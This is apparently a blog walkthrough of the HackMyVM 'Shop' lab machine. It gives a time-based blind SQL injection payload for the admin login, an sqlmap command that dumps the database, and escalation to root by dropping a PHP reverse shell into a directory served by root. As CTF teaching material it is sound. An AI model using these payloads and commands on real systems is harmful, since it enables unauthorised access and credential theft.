HackMyVM - Shop

 



Shop by D4t4s3c is classiefied as easy, like most machines they are easy if you know how to do it and not so easy if you don't. If you have not seen blind SQL injection before then its not that easy!

Find it


Scan it


So just http(80) and ssh on a high port available.

User

running nikto -h http://10.0.0.22 identified /shop as interesting and again running it against the /shop url point to the way forward with /shop/administrator/


The login page can be manipulated with time based SQL injection.
trying different SQL options for the username 
' or sleep(5)--
and anything in th password field


When executed on the server this changes the SQL query from
Select something from table where user='username' AND password='password'
to
select something from table where user='' or sleep(5)-- everything else is commented out !

So as we cant see the results of anything what we need is a tool to automate blind SQL.
https://sqlmap.org/
Install with sudo apt-get sqlmap or read the manual on the website!

There is probably a quick way to do this but...

sqlmap -u http://10.0.0.22/shop/administrator/ --forms --current-db --dump  


The script asks a bunch of questions but changes the default answer to the most common response (capitalised letter) so just hitting return and seeing what happens works happily!
It tries all the combinations of queries to get data out a char at a time. so its not quick.
After about 8 minutes...

4 accounts and trial and error and we can logon as bart


Escalate to root

I like to run linpeas.sh on a target as it give a good overall scan and the more you look at the outputs of it the more you notice what is normal or out of place.




In the output it does identify that root is running php on port 65000 and serving from /dev/shm

So just stick a reverse shell command in there and call it. I keep and tend to use a reverse shell file from:
php-reverse-shell | pentestmonkey  








Comments

Post a Comment

Popular posts from this blog

Espo - HackMyVM

Image
Another interesting machine from cromiphi... Writeup abridged to remove the several hour pause before making any progress!!! Discovery: ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo netdiscover -r 10.0.0.0/24 -i eth1 -P _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.0.0.1 08:00:27:c5:8d:93 1 60 PCS Systemtechnik GmbH 10.0.0.161 08:00:27:4f:55:18 1 60 PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. ┌──( kali㉿kali )-[ ~/hmv/espo ] └─ $ sudo nmap -sC -sV -O -p- -oN nmap.out 10.0.0.161 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 05:21 EST Nmap scan report for 10.0.0.161 Host is up (0.0016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)...
Read more

HackMyVM - Comingsoon

Image
  Find it └─ $ sudo netdiscover -r 10.0.0.0/24 -P | tee findit [sudo] password for kali:     _____________________________________________________________________________    IP             At MAC Address     Count     Len   MAC Vendor / Hostname         -----------------------------------------------------------------------------   10.0.0.1         08:00:27:96:87:13       1       60   PCS Systemtechnik GmbH   10.0.0.90       08:00:27:03:05:3c       1       60   PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found.      Scan it └─ $ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.90   Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 12:49 EST Nmap scan report for 10.0.0.90 Host is up (0.00097s latency). Not shown: 65533 closed ports POR...
Read more

Zeug - HackMyVM

Image
  This was a really nice machine, if you like to be annoyed by trying to do the same thing many different ways until you eventually get somewhere... Thank you c4rta - looking forward to your next machine ;) Find it sudo netdiscover -r 10.0.0.0/24 -i eth1 -P  _____________________________________________________________________________    IP            At MAC Address     Count     Len  MAC Vendor / Hostname        -----------------------------------------------------------------------------  10.0.0.1        08:00:27:41:d0:fa      1      60  PCS Systemtechnik GmbH  10.0.0.123      08:00:27:fc:d6:0f      1      60  PCS Systemtechnik GmbH -- Active scan completed, 2 Hosts found. nmap -v -T4 -p- 10.0.0.123        Starting Nmap 7.94 ( https://nmap.org ...
Read more